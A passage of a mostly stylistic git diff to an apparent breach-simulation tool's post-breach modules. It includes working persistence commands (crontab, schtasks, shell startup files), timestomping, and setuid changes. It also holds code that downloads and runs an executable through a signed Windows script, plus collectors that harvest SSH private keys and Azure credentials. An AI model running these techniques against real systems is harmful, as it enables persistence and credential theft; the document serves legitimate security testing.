infection_monkey.utils.environment import is_windows_os diff --git a/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py index 4ed5ff970..09a8075e0 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/linux_job_scheduling.py @@ -3,10 +3,10 @@ TEMP_CRON = "$HOME/monkey-schedule-jobs" def get_linux_commands_to_schedule_jobs(): return [ - f'touch {TEMP_CRON} &&', - f'crontab -l > {TEMP_CRON} &&', - 'echo \"# Successfully scheduled a job using crontab\" |', - f'tee -a {TEMP_CRON} &&', - f'crontab {TEMP_CRON} ;', - f'rm {TEMP_CRON}' + f"touch {TEMP_CRON} &&", + f"crontab -l > {TEMP_CRON} &&", + 'echo "# Successfully scheduled a job using crontab" |', + f"tee -a {TEMP_CRON} &&", + f"crontab {TEMP_CRON} ;", + f"rm {TEMP_CRON}", ] diff --git a/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py index 6fd888d67..4c4927419 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/windows_job_scheduling.py @@ -1,12 +1,12 @@ -SCHEDULED_TASK_NAME = 'monkey-spawn-cmd' -SCHEDULED_TASK_COMMAND = r'C:\windows\system32\cmd.exe' +SCHEDULED_TASK_NAME = "monkey-spawn-cmd" +SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe" # Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md def get_windows_commands_to_schedule_jobs(): - return f'schtasks /Create /SC monthly /F /TN {SCHEDULED_TASK_NAME} /TR {SCHEDULED_TASK_COMMAND}' + return f"schtasks /Create /SC monthly /F /TN {SCHEDULED_TASK_NAME} /TR {SCHEDULED_TASK_COMMAND}" def get_windows_commands_to_remove_scheduled_jobs(): - return f'schtasks /Delete /TN {SCHEDULED_TASK_NAME} /F > nul 2>&1' + return f"schtasks /Delete /TN {SCHEDULED_TASK_NAME} /F > nul 2>&1" diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 93d10d45e..e9bf61935 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py @@ -11,7 +11,7 @@ from infection_monkey.utils.plugins.plugin import Plugin LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" class PBA(Plugin): @@ -60,7 +60,9 @@ class PBA(Plugin): exec_funct = self._execute_default result = exec_funct() if self.scripts_were_used_successfully(result): - T1064Telem(ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action.").send() + T1064Telem( + ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action." + ).send() PostBreachTelem(self, result).send() else: LOG.debug(f"No command available for PBA '{self.name}' on current OS, skipping.") @@ -87,7 +89,9 @@ class PBA(Plugin): :return: Tuple of command's output string and boolean, indicating if it succeeded """ try: - output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True).decode() + output = subprocess.check_output( + self.command, stderr=subprocess.STDOUT, shell=True + ).decode() return output, True except subprocess.CalledProcessError as e: # Return error output of the command diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index 888984551..315cdac0b 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -7,7 +7,7 @@ from infection_monkey.utils.environment import is_windows_os LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" PATH_TO_ACTIONS = "infection_monkey.post_breach.actions." diff --git a/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py b/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py index b1f40b5b7..5a4a7f1dc 100644 --- a/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py +++ b/monkey/infection_monkey/post_breach/setuid_setgid/linux_setuid_setgid.py @@ -1,11 +1,11 @@ -TEMP_FILE = '$HOME/monkey-temp-file' +TEMP_FILE = "$HOME/monkey-temp-file" # Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md def get_linux_commands_to_setuid_setgid(): return [ - f'touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&', + f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&", 'echo "Successfully changed setuid/setgid bits" &&', - f'rm {TEMP_FILE}' + f"rm {TEMP_FILE}", ] diff --git a/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py b/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py index 7760ab900..8997e143c 100644 --- a/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py +++ b/monkey/infection_monkey/post_breach/setuid_setgid/setuid_setgid.py @@ -1,4 +1,6 @@ -from infection_monkey.post_breach.setuid_setgid.linux_setuid_setgid import get_linux_commands_to_setuid_setgid +from infection_monkey.post_breach.setuid_setgid.linux_setuid_setgid import ( + get_linux_commands_to_setuid_setgid, +) def get_commands_to_change_setuid_setgid(): diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py index 60e47d50c..ddd8f514b 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/linux/shell_startup_files_modification.py @@ -5,36 +5,43 @@ from infection_monkey.utils.environment import is_windows_os def get_linux_commands_to_modify_shell_startup_files(): if is_windows_os(): - return '', [], [] + return "", [], [] HOME_DIR = "/home/" # get list of usernames - USERS = subprocess.check_output( # noqa: DUO116 - "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", - shell=True - ).decode().split('\n')[:-1] + USERS = ( + subprocess.check_output( # noqa: DUO116 + "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", shell=True + ) + .decode() + .split("\n")[:-1] + ) # get list of paths of different shell startup files with place for username STARTUP_FILES = [ - file_path.format(HOME_DIR) for file_path in - [ - "{0}{{0}}/.profile", # bash, dash, ksh, sh - "{0}{{0}}/.bashrc", # bash + file_path.format(HOME_DIR) + for file_path in [ + "{0}{{0}}/.profile", # bash, dash, ksh, sh + "{0}{{0}}/.bashrc", # bash "{0}{{0}}/.bash_profile", - "{0}{{0}}/.config/fish/config.fish", # fish - "{0}{{0}}/.zshrc", # zsh + "{0}{{0}}/.config/fish/config.fish", # fish + "{0}{{0}}/.zshrc", # zsh "{0}{{0}}/.zshenv", "{0}{{0}}/.zprofile", - "{0}{{0}}/.kshrc", # ksh - "{0}{{0}}/.tcshrc", # tcsh - "{0}{{0}}/.cshrc", # csh + "{0}{{0}}/.kshrc", # ksh + "{0}{{0}}/.tcshrc", # tcsh + "{0}{{0}}/.cshrc", # csh ] ] - return [ - '3<{0} 3<&- &&', # check for existence of file - 'echo \"# Succesfully modified {0}\" |', - 'tee -a {0} &&', # append to file - 'sed -i \'$d\' {0}', # remove last line of file (undo changes) - ], STARTUP_FILES, USERS + return ( + [ + "3<{0} 3<&- &&", # check for existence of file + 'echo "# Succesfully modified {0}" |', + "tee -a {0} &&", # append to file + "sed -i '$d' {0}", # remove last line of file (undo changes) + ], + STARTUP_FILES, + USERS, + ) diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py index 65774c2ad..0be9ec369 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/shell_startup_files_modification.py @@ -1,7 +1,9 @@ -from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import \ - get_linux_commands_to_modify_shell_startup_files -from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import \ - get_windows_commands_to_modify_shell_startup_files +from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import ( + get_linux_commands_to_modify_shell_startup_files, +) +from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import ( + get_windows_commands_to_modify_shell_startup_files, +) def get_commands_to_modify_shell_startup_files(): diff --git a/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py b/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py index a4d32938e..517692276 100644 --- a/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py +++ b/monkey/infection_monkey/post_breach/shell_startup_files/windows/shell_startup_files_modification.py @@ -5,23 +5,27 @@ from infection_monkey.utils.environment import is_windows_os def get_windows_commands_to_modify_shell_startup_files(): if not is_windows_os(): - return '', [] + return "", [] # get powershell startup file path - SHELL_STARTUP_FILE = subprocess.check_output('powershell $Profile').decode().split("\r\n")[0] + SHELL_STARTUP_FILE = subprocess.check_output("powershell $Profile").decode().split("\r\n")[0] SHELL_STARTUP_FILE_PATH_COMPONENTS = SHELL_STARTUP_FILE.split("\\") # get list of usernames - USERS = subprocess.check_output('dir C:\\Users /b', shell=True).decode().split("\r\n")[:-1] # noqa: DUO116 + USERS = ( + subprocess.check_output("dir C:\\Users /b", shell=True).decode().split("\r\n")[:-1] + ) # noqa: DUO116 USERS.remove("Public") - STARTUP_FILES_PER_USER = ['\\'.join(SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + - [user] + - SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]) - for user in USERS] + STARTUP_FILES_PER_USER = [ + "\\".join( + SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:] + ) + for user in USERS + ] return [ - 'powershell.exe', - 'infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1', - '-startup_file_path {0}' + "powershell.exe", + "infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1", + "-startup_file_path {0}", ], STARTUP_FILES_PER_USER diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py index 5db88cfc4..cfabaafec 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py @@ -1,8 +1,10 @@ import subprocess from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import ( - get_windows_commands_to_delete_temp_comspec, get_windows_commands_to_proxy_execution_using_signed_script, - get_windows_commands_to_reset_comspec) + get_windows_commands_to_delete_temp_comspec, + get_windows_commands_to_proxy_execution_using_signed_script, + get_windows_commands_to_reset_comspec, +) from infection_monkey.utils.environment import is_windows_os @@ -13,5 +15,7 @@ def get_commands_to_proxy_execution_using_signed_script(): def cleanup_changes(original_comspec): if is_windows_os(): - subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116 + subprocess.run( + get_windows_commands_to_reset_comspec(original_comspec), shell=True + ) # noqa: DUO116 subprocess.run(get_windows_commands_to_delete_temp_comspec(), shell=True) # noqa: DUO116 diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index 6cdf5fe01..b1918a716 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -2,27 +2,24 @@ import os from infection_monkey.control import ControlClient -TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') +TEMP_COMSPEC = os.path.join(os.getcwd(), "random_executable.exe") def get_windows_commands_to_proxy_execution_using_signed_script(): download = ControlClient.get_T1216_pba_file() - with open(TEMP_COMSPEC, 'wb') as random_exe_obj: + with open(TEMP_COMSPEC, "wb") as random_exe_obj: random_exe_obj.write(download.content) random_exe_obj.flush() - windir_path = os.environ['WINDIR'] - signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') + windir_path = os.environ["WINDIR"] + signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf") - return [ - f'set comspec={TEMP_COMSPEC} &&', - f'cscript {signed_script}' - ] + return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"] def get_windows_commands_to_reset_comspec(original_comspec): - return f'set comspec={original_comspec}' + return f"set comspec={original_comspec}" def get_windows_commands_to_delete_temp_comspec(): - return f'del {TEMP_COMSPEC} /f' + return f"del {TEMP_COMSPEC} /f" diff --git a/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py b/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py index 5638e16cc..2956c140f 100644 --- a/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/tests/actions/test_users_custom_pba.py @@ -34,9 +34,7 @@ def set_os_windows(monkeypatch): @pytest.fixture -def mock_UsersPBA_linux_custom_file_and_cmd( - set_os_linux, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_linux_custom_file_and_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch): monkeypatch.setattr( "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", CUSTOM_LINUX_CMD, @@ -56,9 +54,7 @@ def test_command_linux_custom_file_and_cmd( @pytest.fixture -def mock_UsersPBA_windows_custom_file_and_cmd( - set_os_windows, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_windows_custom_file_and_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch): monkeypatch.setattr( "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", CUSTOM_WINDOWS_CMD, @@ -80,9 +76,7 @@ def test_command_windows_custom_file_and_cmd( @pytest.fixture def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch): - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None) monkeypatch.setattr( "infection_monkey.config.WormConfiguration.PBA_linux_filename", CUSTOM_LINUX_FILENAME, @@ -96,13 +90,9 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file): @pytest.fixture -def mock_UsersPBA_windows_custom_file( - set_os_windows, fake_monkey_dir_path, monkeypatch -): +def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch): - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None) monkeypatch.setattr( "infection_monkey.config.WormConfiguration.PBA_windows_filename", CUSTOM_WINDOWS_FILENAME, @@ -122,9 +112,7 @@ def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypat "infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", CUSTOM_LINUX_CMD, ) - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.PBA_linux_filename", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.PBA_linux_filename", None) return UsersPBA() @@ -140,9 +128,7 @@ def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monke "infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", CUSTOM_WINDOWS_CMD, ) - monkeypatch.setattr( - "infection_monkey.config.WormConfiguration.PBA_windows_filename", None - ) + monkeypatch.setattr("infection_monkey.config.WormConfiguration.PBA_windows_filename", None) return UsersPBA() diff --git a/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py index ee6c02f58..4860e2d3e 100644 --- a/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/linux/timestomping.py @@ -1,13 +1,13 @@ -TEMP_FILE = 'monkey-timestomping-file.txt' -TIMESTAMP_EPOCH = '197001010000.00' +TEMP_FILE = "monkey-timestomping-file.txt" +TIMESTAMP_EPOCH = "197001010000.00" def get_linux_timestomping_commands(): return [ f'echo "Successfully changed a file\'s modification timestamp" > {TEMP_FILE} && ' - f'touch -m -t {TIMESTAMP_EPOCH} {TEMP_FILE} && ' - f'cat {TEMP_FILE} ; ' - f'rm {TEMP_FILE} -f' + f"touch -m -t {TIMESTAMP_EPOCH} {TEMP_FILE} && " + f"cat {TEMP_FILE} ; " + f"rm {TEMP_FILE} -f" ] diff --git a/monkey/infection_monkey/post_breach/timestomping/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/timestomping.py index 321904c41..5e71d1e50 100644 --- a/monkey/infection_monkey/post_breach/timestomping/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/timestomping.py @@ -1,5 +1,9 @@ -from infection_monkey.post_breach.timestomping.linux.timestomping import get_linux_timestomping_commands -from infection_monkey.post_breach.timestomping.windows.timestomping import get_windows_timestomping_commands +from infection_monkey.post_breach.timestomping.linux.timestomping import ( + get_linux_timestomping_commands, +) +from infection_monkey.post_breach.timestomping.windows.timestomping import ( + get_windows_timestomping_commands, +) def get_timestomping_commands(): diff --git a/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py b/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py index 9f23193f7..952ae46c6 100644 --- a/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py +++ b/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.py @@ -1,8 +1,8 @@ -TEMP_FILE = 'monkey-timestomping-file.txt' +TEMP_FILE = "monkey-timestomping-file.txt" def get_windows_timestomping_commands(): - return 'powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1' + return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1" # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md diff --git a/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py b/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py index 8a251e258..0b9c74b04 100644 --- a/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py +++ b/monkey/infection_monkey/post_breach/trap_command/linux_trap_command.py @@ -1,5 +1,5 @@ def get_linux_trap_commands(): return [ - 'trap \'echo \"Successfully used trap command\"\' INT && kill -2 $$ ;', # trap and send SIGINT signal - 'trap - INT' # untrap SIGINT + "trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal + "trap - INT", # untrap SIGINT ] diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py index 2bfb21972..245f7574b 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.exploit.py @@ -1,4 +1,4 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules -hiddenimports = collect_submodules('infection_monkey.exploit') -datas = (collect_data_files('infection_monkey.exploit', include_py_files=True)) +hiddenimports = collect_submodules("infection_monkey.exploit") +datas = collect_data_files("infection_monkey.exploit", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py index e80038ebd..07a29b086 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.network.py @@ -1,4 +1,4 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules -hiddenimports = collect_submodules('infection_monkey.network') -datas = (collect_data_files('infection_monkey.network', include_py_files=True)) +hiddenimports = collect_submodules("infection_monkey.network") +datas = collect_data_files("infection_monkey.network", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py index 55dc7c8c9..9f83c775d 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.post_breach.actions.py @@ -1,6 +1,6 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules # Import all actions as modules -hiddenimports = collect_submodules('infection_monkey.post_breach.actions') +hiddenimports = collect_submodules("infection_monkey.post_breach.actions") # Add action files that we enumerate -datas = (collect_data_files('infection_monkey.post_breach.actions', include_py_files=True)) +datas = collect_data_files("infection_monkey.post_breach.actions", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py index 10fe02a17..22d2740bb 100644 --- a/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py +++ b/monkey/infection_monkey/pyinstaller_hooks/hook-infection_monkey.system_info.collectors.py @@ -1,6 +1,6 @@ from PyInstaller.utils.hooks import collect_data_files, collect_submodules # Import all actions as modules -hiddenimports = collect_submodules('infection_monkey.system_info.collectors') +hiddenimports = collect_submodules("infection_monkey.system_info.collectors") # Add action files that we enumerate -datas = (collect_data_files('infection_monkey.system_info.collectors', include_py_files=True)) +datas = collect_data_files("infection_monkey.system_info.collectors", include_py_files=True) diff --git a/monkey/infection_monkey/pyinstaller_utils.py b/monkey/infection_monkey/pyinstaller_utils.py index 3e2bed17e..2dd8325ce 100644 --- a/monkey/infection_monkey/pyinstaller_utils.py +++ b/monkey/infection_monkey/pyinstaller_utils.py @@ -1,7 +1,7 @@ import os import sys -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" def get_binaries_dir_path(): @@ -9,7 +9,7 @@ def get_binaries_dir_path(): Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise) :return: Binaries dir path """ - if getattr(sys, 'frozen', False): + if getattr(sys, "frozen", False): return sys._MEIPASS else: return os.path.dirname(os.path.abspath(__file__)) diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 3977d2444..556b5472c 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -6,7 +6,7 @@ import pwd from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1005_telem import T1005Telem -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) @@ -16,7 +16,7 @@ class SSHCollector(object): SSH keys and known hosts collection module """ - default_dirs = ['/.ssh/', '/'] + default_dirs = ["/.ssh/", "/"] @staticmethod def get_info(): @@ -37,33 +37,41 @@ class SSHCollector(object): known_hosts: contents of known_hosts file(all the servers keys are good for, possibly hashed) """ - return {'name': name, 'home_dir': home_dir, 'public_key': None, - 'private_key': None, 'known_hosts': None} + return { + "name": name, + "home_dir": home_dir, + "public_key": None, + "private_key": None, + "known_hosts": None, + } @staticmethod def get_home_dirs(): - root_dir = SSHCollector.get_ssh_struct('root', '') - home_dirs = [SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() - if x.pw_dir.startswith('/home')] + root_dir = SSHCollector.get_ssh_struct("root", "") + home_dirs = [ + SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) + for x in pwd.getpwall() + if x.pw_dir.startswith("/home") + ] home_dirs.append(root_dir) return home_dirs @staticmethod def get_ssh_files(usr_info): for info in usr_info: - path = info['home_dir'] + path = info["home_dir"] for directory in SSHCollector.default_dirs: if os.path.isdir(path + directory): try: current_path = path + directory # Searching for public key - if glob.glob(os.path.join(current_path, '*.pub')): + if glob.glob(os.path.join(current_path, "*.pub")): # Getting first file in current path with .pub extension(public key) - public = (glob.glob(os.path.join(current_path, '*.pub'))[0]) + public = glob.glob(os.path.join(current_path, "*.pub"))[0] LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info["public_key"] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): @@ -71,30 +79,35 @@ class SSHCollector(object): with open(private) as f: # no use from ssh key if it's encrypted private_key = f.read() - if private_key.find('ENCRYPTED') == -1: - info['private_key'] = private_key + if private_key.find("ENCRYPTED") == -1: + info["private_key"] = private_key LOG.info("Found private key in %s" % private) - T1005Telem(ScanStatus.USED, 'SSH key', "Path: %s" % private).send() + T1005Telem( + ScanStatus.USED, "SSH key", "Path: %s" % private + ).send() else: continue except (IOError, OSError): pass # By default known hosts file is called 'known_hosts' - known_hosts = os.path.join(current_path, 'known_hosts') + known_hosts = os.path.join(current_path, "known_hosts") if os.path.exists(known_hosts): try: with open(known_hosts) as f: - info['known_hosts'] = f.read() + info["known_hosts"] = f.read() LOG.info("Found known_hosts in %s" % known_hosts) except (IOError, OSError): pass # If private key found don't search more - if info['private_key']: + if info["private_key"]: break except (IOError, OSError): pass except OSError: pass - usr_info = [info for info in usr_info if info['private_key'] or info['known_hosts'] - or info['public_key']] + usr_info = [ + info + for info in usr_info + if info["private_key"] or info["known_hosts"] or info["public_key"] + ] return usr_info diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index a5502a2c0..5fc91f371 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -19,7 +19,7 @@ except NameError: # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied -__author__ = 'uri' +__author__ = "uri" class OperatingSystem(IntEnum): @@ -36,9 +36,11 @@ class SystemInfoCollector(object): self.os = SystemInfoCollector.get_os() if OperatingSystem.Windows == self.os: from .windows_info_collector import WindowsInfoCollector + self.collector = WindowsInfoCollector() else: from .linux_info_collector import LinuxInfoCollector + self.collector = LinuxInfoCollector() def get_info(self): @@ -76,11 +78,10 @@ class InfoCollector(object): :return: None. Updates class information """ LOG.debug("Reading subnets") - self.info['network_info'] = \ - { - 'networks': get_host_subnets(), - 'netstat': NetstatCollector.get_netstat_info() - } + self.info["network_info"] = { + "networks": get_host_subnets(), + "netstat": NetstatCollector.get_netstat_info(), + } def get_azure_info(self): """ @@ -91,11 +92,12 @@ class InfoCollector(object): # noinspection PyBroadException try: from infection_monkey.config import WormConfiguration + if AZURE_CRED_COLLECTOR not in WormConfiguration.system_info_collector_classes: return LOG.debug("Harvesting creds if on an Azure machine") azure_collector = AzureCollector() - if 'credentials' not in self.info: + if "credentials" not in self.info: self.info["credentials"] = {} azure_creds = azure_collector.extract_stored_credentials() for cred in azure_creds: @@ -105,11 +107,11 @@ class InfoCollector(object): self.info["credentials"][username] = {} # we might be losing passwords in case of multiple reset attempts on same username # or in case another collector already filled in a password for this user - self.info["credentials"][username]['password'] = password - self.info["credentials"][username]['username'] = username + self.info["credentials"][username]["password"] = password + self.info["credentials"][username]["username"] = username if len(azure_creds) != 0: self.info["Azure"] = {} - self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds] + self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds] except Exception: # If we failed to collect azure info, no reason to fail all the collection. Log and continue. LOG.error("Failed collecting Azure info.", exc_info=True) diff --git a/monkey/infection_monkey/system_info/azure_cred_collector.py b/monkey/infection_monkey/system_info/azure_cred_collector.py index bb0240198..68cd05a4e 100644 --- a/monkey/infection_monkey/system_info/azure_cred_collector.py +++ b/monkey/infection_monkey/system_info/azure_cred_collector.py @@ -9,7 +9,7 @@ from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1005_telem import T1005Telem from infection_monkey.telemetry.attack.t1064_telem import T1064Telem -__author__ = 'danielg' +__author__ = "danielg" LOG = logging.getLogger(__name__) @@ -21,7 +21,9 @@ class AzureCollector(object): def __init__(self): if sys.platform.startswith("win"): - self.path = "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings" + self.path = ( + "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings" + ) self.extractor = AzureCollector.get_pass_windows else: self.path = "/var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config" @@ -46,21 +48,27 @@ class AzureCollector(object): """ linux_cert_store = "/var/lib/waagent/" try: - json_data = json.load(open(filepath, 'r')) + json_data = json.load(open(filepath, "r")) # this is liable to change but seems to be stable over the last year - protected_data = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettings'] - cert_thumbprint = json_data['runtimeSettings'][0]['handlerSettings']['protectedSettingsCertThumbprint'] + protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"] + cert_thumbprint = json_data["runtimeSettings"][0]["handlerSettings"][ + "protectedSettingsCertThumbprint" + ] base64_command = """openssl base64 -d -a""" priv_path = os.path.join(linux_cert_store, "%s.prv" % cert_thumbprint) - b64_proc = subprocess.Popen(base64_command.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE) + b64_proc = subprocess.Popen( + base64_command.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE + ) b64_result = 